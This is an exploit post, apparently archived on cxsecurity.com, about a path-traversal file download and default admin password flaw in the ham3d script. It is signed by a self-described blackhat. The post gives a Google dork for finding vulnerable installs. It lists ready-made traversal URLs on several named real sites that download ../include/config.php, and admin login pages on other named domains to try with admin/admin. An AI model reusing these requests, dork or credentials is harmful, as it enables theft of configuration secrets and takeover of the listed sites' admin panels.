ham3d Information Processing Script Local File Download & Default Password Vulnerability

2019.10.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

/*********************************************************************************** ** Exploit Title: ham3d Information Processing Script Local File Download & Default Password Vulnerability ** ** Exploit Author: Milad Hacking ** ** Vendor Homepage : http://www.ham3d.net/ ** ** Demo Script Link: http://wensoni.com ** ** Version : 1.1 ** ** Google Dork : inurl:fa/forgotpass.html ** ** Date: 2019-10-25 ** ** Tested on: Kali Linux / lceweasel ** *********************************************************************************** ** Demo : http://123cookie.ir/ajax.php?download=../include/config.php http://1q1.ir/ajax.php?download=../include/config.php http://emitice.ir/ajax.php?download=../include/config.php http://wensoni.com/ajax.php?download=../include/config.php http://tiamnetworks.ir/ajax.php?download=../include/config.php http://assc.ir/ajax.php?download=../include/config.php User * Password With Login : admin http://www.5040.ir/report/admin/ http://www.shoaco.com/admin951shoaco/index.php?login http://quran.kish.ir/admin159357kishetrat2486/?login http://setareganzamin.com/ADMIN123654789SETAREGANEZAMIN/index.php?login http://assc.ir/admin/?forgot_password#?login *********************************************************************************** ** Special thanks to: iliya Norton - Milad Hacking - N3TC4T - Nazila Blackhat - Mahsa Black - Azinista Mahdi Cocain - Vahid Elmi Long Love Ashiyane <3 *********************************************************************************** https://tlgm.me/Milad_Hacking http://instagram.com/Milad.Hacking milad.hacking.blackhat@Gmail.com ***********************************************************************************


Vote for this issue:
66%
34%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top